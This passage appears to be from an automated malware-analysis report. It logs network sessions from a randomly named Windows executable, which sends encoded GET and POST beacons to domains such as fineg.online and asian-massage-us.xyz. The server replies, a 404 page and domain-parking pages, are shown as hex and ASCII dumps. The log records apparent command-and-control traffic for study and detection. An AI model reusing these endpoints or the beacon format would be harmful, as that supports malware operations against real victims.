275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                        Sep 3, 2024 10:44:33.730429888 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                        Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                        Sep 3, 2024 10:44:33.730441093 CEST448INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                        Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                        Sep 3, 2024 10:44:33.730454922 CEST1236INData Raw: 22 73 74 32 22 20 64 3d 22 4d 32 37 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 38 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c
                        Data Ascii: "st2" d="M279.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M289.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M299.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M309.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M319.8
                        Sep 3, 2024 10:44:33.730474949 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64
                        Data Ascii: > <path class="st2" d="M499.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M1000 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M990 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M980 282.4h-3l-6.8 25.2h3z"/> <path class="s
                        Sep 3, 2024 10:44:33.730488062 CEST1236INData Raw: 20 64 3d 22 4d 37 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 38 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32
                        Data Ascii: d="M790 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M780 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M770 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M760 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M750 282.4h-3l-6.8
                        Sep 3, 2024 10:44:33.730509043 CEST1236INData Raw: 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 35 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 3c 70 61 74 68
                        Data Ascii: 2h3z"/> <path class="st2" d="M560 282.4h-3l-6.8 25.2h3z"/> <g> <path class="st2" d="M-490.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-480.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-470.2 282.4h-3l-6.8 25.
                        Sep 3, 2024 10:44:33.730520964 CEST328INData Raw: 3d 22 4d 2d 33 30 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e
                        Data Ascii: ="M-300.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-290.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-280.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-270.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M
                        Sep 3, 2024 10:44:33.731102943 CEST1236INData Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                        Data Ascii: h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z
                        Sep 3, 2024 10:44:33.731113911 CEST224INData Raw: 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f
                        Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-30.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2
                        Sep 3, 2024 10:44:33.735368013 CEST1236INData Raw: 22 20 64 3d 22 4d 2d 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 35 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32
                        Data Ascii: " d="M-.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M500 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M490 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M480 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M470 282.4


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.464990162.0.239.141804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:35.717251062 CEST442OUTGET /mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.fineg.online
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:44:36.274971962 CEST1236INHTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:44:36 GMT
                        Server: Apache
                        Content-Length: 18121
                        Connection: close
                        Content-Type: text/html; charset=utf-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                        Sep 3, 2024 10:44:36.274993896 CEST1236INData Raw: 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20
                        Data Ascii: .2s54.7-28 117.5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d=
                        Sep 3, 2024 10:44:36.275007963 CEST1236INData Raw: 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38
                        Data Ascii: class="st2" d="M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
                        Sep 3, 2024 10:44:36.275019884 CEST1236INData Raw: 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                        Data Ascii: .2h3z"/> <path class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <p
                        Sep 3, 2024 10:44:36.275032997 CEST896INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22
                        Data Ascii: > <path class="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                        Sep 3, 2024 10:44:36.275152922 CEST1236INData Raw: 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36
                        Data Ascii: s="st2" d="M710 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-
                        Sep 3, 2024 10:44:36.275166035 CEST224INData Raw: 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20
                        Data Ascii: <path class="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6
                        Sep 3, 2024 10:44:36.275238991 CEST1236INData Raw: 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70
                        Data Ascii: .8 25.2h3z"/> <path class="st2" d="M-390.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-380.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8
                        Sep 3, 2024 10:44:36.275295973 CEST224INData Raw: 22 20 64 3d 22 4d 2d 31 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 38 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c
                        Data Ascii: " d="M-190.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-180.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-170.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/>
                        Sep 3, 2024 10:44:36.275305986 CEST1236INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d
                        Data Ascii: <path class="st2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <pa
                        Sep 3, 2024 10:44:36.279951096 CEST1236INData Raw: 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38
                        Data Ascii: th class="st2" d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.464991199.59.243.226804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:41.478301048 CEST736OUTPOST /kc69/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.asian-massage-us.xyz
                        Origin: http://www.asian-massage-us.xyz
                        Referer: http://www.asian-massage-us.xyz/kc69/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2b 43 68 30 6d 4f 64 71 70 36 63 48 54 6b 46 66 7a 57 36 69 6d 30 78 6a 73 67 47 6c 44 32 50 79 46 2b 75 4b 59 6d 74 73 5a 52 31 78 2f 6d 64 2b 71 46 48 6d 56 31 2f 68 48 6d 5a 38 76 4d 54 54 2f 4c 4b 61 62 6a 2b 64 51 62 7a 42 6a 66 6d 34 4d 32 6a 59 35 34 77 38 58 48 52 36 62 33 77 79 77 61 30 75 6f 2b 37 6f 38 4b 4b 39 65 35 48 47 68 61 63 39 56 37 76 68 30 51 44 4a 79 2b 45 52 5a 73 32 59 31 63 54 6b 66 45 34 66 38 42 41 64 43 6b 77 5a 48 61 5a 62 35 62 76 34 50 6b 33 78 2b 51 68 50 62 58 2f 2b 4a 57 35 77 45 34 56 76 74 56 42 6e 63 51 3d 3d
                        Data Ascii: Qd=AkBl0xNSGkvk+Ch0mOdqp6cHTkFfzW6im0xjsgGlD2PyF+uKYmtsZR1x/md+qFHmV1/hHmZ8vMTT/LKabj+dQbzBjfm4M2jY54w8XHR6b3wywa0uo+7o8KK9e5HGhac9V7vh0QDJy+ERZs2Y1cTkfE4f8BAdCkwZHaZb5bv4Pk3x+QhPbX/+JW5wE4VvtVBncQ==
                        Sep 3, 2024 10:44:41.933306932 CEST1236INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:44:41 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1146
                        x-request-id: 35096c67-caa9-4160-a3e7-d2b3c59cc9e9
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                        set-cookie: parking_session=35096c67-caa9-4160-a3e7-d2b3c59cc9e9; expires=Tue, 03 Sep 2024 08:59:41 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:44:41.933324099 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzUwOTZjNjctY2FhOS00MTYwLWEzZTctZDJiM2M1OWNjOWU5IiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.464992199.59.243.226804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:44.020411968 CEST756OUTPOST /kc69/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.asian-massage-us.xyz
                        Origin: http://www.asian-massage-us.xyz
                        Referer: http://www.asian-massage-us.xyz/kc69/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2f 69 52 30 6e 74 31 71 2b 4b 63 49 50 30 46 66 6f 6d 36 6d 6d 30 31 6a 73 69 71 31 44 46 72 79 46 62 4b 4b 5a 6e 74 73 63 52 31 78 74 47 64 6e 6b 6c 48 78 56 31 7a 70 48 6b 64 38 76 4d 48 54 2f 4b 36 61 62 77 57 65 54 72 7a 44 72 2f 6d 41 43 57 6a 59 35 34 77 38 58 48 31 41 62 33 49 79 77 71 6b 75 70 66 37 72 30 71 4b 2b 4f 5a 48 47 72 36 63 6d 56 37 76 66 30 52 4f 55 79 34 41 52 5a 70 4b 59 31 4a 2f 6e 55 45 35 31 78 68 42 54 53 46 52 4a 4b 66 73 55 30 4b 48 68 47 6b 75 52 2f 57 77 56 4b 6d 65 70 62 57 64 44 5a 2f 63 62 67 57 38 75 48 61 4e 57 7a 62 4f 5a 59 70 71 34 4f 6c 6f 35 52 33 58 59 36 62 67 3d
                        Data Ascii: Qd=AkBl0xNSGkvk/iR0nt1q+KcIP0Ffom6mm01jsiq1DFryFbKKZntscR1xtGdnklHxV1zpHkd8vMHT/K6abwWeTrzDr/mACWjY54w8XH1Ab3Iywqkupf7r0qK+OZHGr6cmV7vf0ROUy4ARZpKY1J/nUE51xhBTSFRJKfsU0KHhGkuR/WwVKmepbWdDZ/cbgW8uHaNWzbOZYpq4Olo5R3XY6bg=
                        Sep 3, 2024 10:44:44.455370903 CEST1236INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:44:43 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1146
                        x-request-id: 0c5a446b-4dea-4ada-9f23-b8b7038d8b9f
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                        set-cookie: parking_session=0c5a446b-4dea-4ada-9f23-b8b7038d8b9f; expires=Tue, 03 Sep 2024 08:59:44 GMT; path=/
                        connection: close
